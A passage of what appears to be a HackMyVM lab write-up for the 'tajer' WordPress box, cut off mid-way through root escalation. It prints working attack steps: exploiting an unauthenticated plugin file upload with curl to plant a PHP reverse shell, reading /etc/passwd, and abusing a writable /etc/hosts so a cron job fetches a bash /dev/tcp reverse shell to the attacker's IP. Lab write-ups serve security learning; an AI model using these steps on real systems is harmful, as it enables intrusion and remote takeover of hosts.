href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840107.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840107.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406160738135\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>No point in trying weak passwords; let's try SQL injection instead:<\/p>\n<pre><code class=\"language-text\">POST \/wp-login.php HTTP\/1.1\nHost: tajer.wordpress.hmv\nContent-Length: 111\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/tajer.wordpress.hmv\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/121.0.6167.85 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7\nReferer: http:\/\/tajer.wordpress.hmv\/wp-login.php?redirect_to=http%3A%2F%2Ftajer.wordpress.hmv%2Fwp-admin%2F&amp;reauth=1\nAccept-Encoding: gzip, deflate, br\nAccept-Language: en-US,en;q=0.9\nCookie: wordpress_test_cookie=WP%20Cookie%20check\nConnection: close\n\nlog=admin&amp;pwd=password&amp;wp-submit=Log+In&amp;redirect_to=http%3A%2F%2Ftajer.wordpress.hmv%2Fwp-admin%2F&amp;testcookie=1<\/code><\/pre>\n<p>The scan found nothing:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840108.png'><img 
class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840108.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406161731281\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840109.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840109.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406161844292\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>So this is probably not the intended way in; let's search for known vulnerabilities:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840110.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" 
data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840110.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406162004280\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>This is getting troublesome... Let's supply an API token and see whether wpscan can find any vulnerabilities:<\/p>\n<h4>wpscan with token<\/h4>\n<pre><code class=\"language-bash\">sudo wpscan --url http:\/\/tajer.wordpress.hmv\/ --api-token=xxxxx<\/code><\/pre>\n<p>You can get a token by registering an account online; it allows 25 requests per day.<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840111.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840111.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406162806670\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>Unauthenticated Plugin File Upload Vulnerability<\/h3>\n<p>The <code>tajer<\/code> plugin is installed, and it has a file upload vulnerability:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840112.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840112.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406162908614\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>The endpoint is reachable, so let's try to exploit it:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840113.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840113.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406163128920\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">curl   -F &quot;files=@revershell.php&quot; http:\/\/tajer.wordpress.hmv\/wp-content\/plugins\/tajer\/lib\/jQuery-File-Upload-master\/server\/php\/index.php\ncurl http:\/\/tajer.wordpress.hmv\/wp-content\/plugins\/tajer\/lib\/jQuery-File-Upload-master\/server\/php\/files\/revershell.php<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840114.png'><img class=\"lazyload lazyload-style-2\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840114.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406163646305\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840115.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840115.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406163633291\" \/><\/div><\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@tajer:\/$ whoami;id\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n(remote) www-data@tajer:\/$ pwd\n\/\n(remote) www-data@tajer:\/$ cat 
\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:113:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmysql:x:107:114:MySQL Server,,,:\/nonexistent:\/bin\/false\nkevin:x:1001:1001::\/home\/kevin:\/bin\/bash\n(remote) www-data@tajer:\/$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any 
other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\n(remote) www-data@tajer:\/$ crontab -l\nno crontab for www-data\n(remote) www-data@tajer:\/$ cd \/homt\nbash: cd: \/homt: No such file or directory\n(remote) www-data@tajer:\/$ cd \/home\n(remote) www-data@tajer:\/home$ ls\nkevin\n(remote) www-data@tajer:\/home$ cd kevin\/\nbash: cd: kevin\/: Permission denied\n(remote) www-data@tajer:\/home$ cd \/tmp;ls -la\ntotal 36\ndrwxrwxrwt  9 root root 4096 Apr  6 04:35 .\ndrwxr-xr-x 18 root root 4096 Mar 31  2022 ..\ndrwxrwxrwt  2 root root 4096 Apr  6 02:55 .ICE-unix\ndrwxrwxrwt  2 root root 4096 Apr  6 02:55 .Test-unix\ndrwxrwxrwt  2 root root 4096 Apr  6 02:55 .X11-unix\ndrwxrwxrwt  2 root root 4096 Apr  6 02:55 .XIM-unix\ndrwxrwxrwt  2 root root 4096 Apr  6 02:55 .font-unix\ndrwx------  3 root root 4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-logind.service-GjHWlh\ndrwx------  3 root root 
4096 Apr  6 02:55 systemd-private-89178c9084794e5b8aa2ce3ecab254f7-systemd-timesyncd.service-c42Ysf\n(remote) www-data@tajer:\/tmp$ cd \/usr\/local\/bin\n(remote) www-data@tajer:\/usr\/local\/bin$ ls -la\ntotal 80\ndrwxr-xr-x  3 root root 4096 Apr  1  2022 .\ndrwxr-xr-x 10 root root 4096 Jan 12  2022 ..\ndrwxr-xr-x  2 root root 4096 Mar 31  2022 __pycache__\n-rwxr-xr-x  1 root root  215 Mar 31  2022 cmark\n-rwxr-xr-x  1 root root  214 Mar 31  2022 deep\n-rwxr-xr-x  1 root root  207 Mar 31  2022 dotenv\n-rwxr-xr-x  1 root root 1651 Mar 31  2022 get_objgraph\n-rwxr-xr-x  1 root root 1695 Mar 31  2022 jp.py\n-rwxr-xr-x  1 root root  211 Mar 31  2022 pbr\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip3\n-rwxr-xr-x  1 root root  221 Mar 31  2022 pip3.9\n-rwxr-xr-x  1 root root  216 Apr  1  2022 pydisasm\n-rwxr-xr-x  1 root root  215 Mar 31  2022 pygmentize\n-rwxr-xr-x  1 root root  205 Mar 31  2022 pysemver\n-rwxr-xr-x  1 root root  205 Mar 31  2022 pytail\n-rwxr-xr-x  1 root root 2078 Apr  1  2022 spark-parser-coverage\n-rwxr-xr-x  1 root root  209 Mar 31  2022 tabulate\n-rwxr-xr-x  1 root root  587 Mar 31  2022 undill\n-rwxr-xr-x  1 root root  208 Mar 31  2022 wheel<\/code><\/pre>\n<h3>Uploading linpeas.sh and pspy64<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840116.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840116.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406165222654\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840117.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840117.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406165356674\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>An error came up and several retries did not help, so I fell back to the old method:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840118.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840118.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406165551195\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>First, run <code>linpeas.sh<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840119.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840119.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406165955000\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>Try switching user:<\/p>\n<pre><code class=\"language-apl\">kevin\nk3v!n7#3c0d3r<\/code><\/pre>\n<pre><code class=\"language-text\">su: Authentication failure<\/code><\/pre>\n<p>Take a look at <code>pspy64<\/code>:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840120.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840120.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406170737252\" style=\"zoom:50%;\" 
\/><\/div><\/p>\n<p>An obvious scheduled task was detected; it requests a file named <code>k3vin<\/code>. Check whether DNS resolution exists for it:<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@tajer:\/$ cat \/etc\/hosts\n127.0.0.1       localhost\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n(remote) www-data@tajer:\/$ ls -l \/etc\/hosts\n-rw-rw-rw- 1 root root 169 Apr  1  2022 \/etc\/hosts<\/code><\/pre>\n<p>There is none, and the <code>hosts<\/code> file is writable, so add an entry pointing to our local IP address, then set up a reverse shell locally for it to execute:<\/p>\n<pre><code class=\"language-bash\">vim k3vin\n# bash -c &#039;exec bash -i &amp;&gt;\/dev\/tcp\/172.20.10.8\/2345 &lt;&amp;1&#039;\npython3 -m http.server 80<\/code><\/pre>\n<pre><code class=\"language-bash\">echo &#039;172.20.10.8  password.wordpress.hmv&#039; &gt;&gt; \/etc\/hosts<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840121.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840121.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406172550145\" 
style=\"zoom:50%;\" \/><\/div><\/p>\n<p>Access from the local machine works; now wait for the good news:<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840122.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404061840122.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240406172845880\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>The shell came back!<\/p>\n<h3>Escalating to root<\/h3>\n<p>My Wi-Fi dropped for a moment, so I reconnected with pwncat; the environment is easier to work in this way, though it makes little difference:<\/p>\n<pre><code class=\"language-bash\">(remote) kevin@tajer:\/home\/kevin$ ls\nuser.txt\n(remote) kevin@tajer:\/home\/kevin$ sudo -l\nsudo: unable to resolve host tajer: Name or service not known\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for kevin: \nSorry, try again.\n[sudo] password for kevin: \nSorry, try again.\n[sudo] password for kevin: \nsudo: 3 incorrect password attempts\n(remote) kevin@tajer:\/home\/kevin$ cd \/\n(remote) kevin@tajer:\/$ ls -la\ntotal 68\ndrwxr-xr-x  18 root root  4096 Mar 31  2022 .\ndrwxr-xr-x  18 root root  4096 Mar 31  2022 ..\nlrwxrwxrwx   1 root root     7 Jan 12  2022 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root root  4096 Mar 31  2022 boot\ndrwxr-xr-x  17 root root  3140 Apr  6 02:55 dev\ndrwxr-xr-x  80 root root  4096 Apr  6 02:55 etc\ndrwxr-xr-x   3 root root  4096 Apr  1  2022 home\nlrwxrwxrwx   1 root root    31 Mar 31  2022 initrd.img -&gt; boot\/initrd.img-5.10.0-13-amd64\nlrwxrwxrwx   1 root root    31 Mar 31  2022 initrd.img.old -&gt; boot\/initrd.img-5.10.0-13-amd64\nlrwxrwxrwx   1 root root     7 Jan 12  2022 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root     9 Jan 12  2022 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root root     9 Jan 12  2022 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root root    10 Jan 12  2022 libx32 -&gt; usr\/libx32\ndrwx------   2 root root 16384 Jan 12  2022 lost+found\ndrwxr-xr-x   3 root root  4096 Jan 12  2022 media\ndrwxr-xr-x   2 root root  4096 Jan 12  2022 mnt\ndrwxrwxrwx   4 root root  4096 Apr  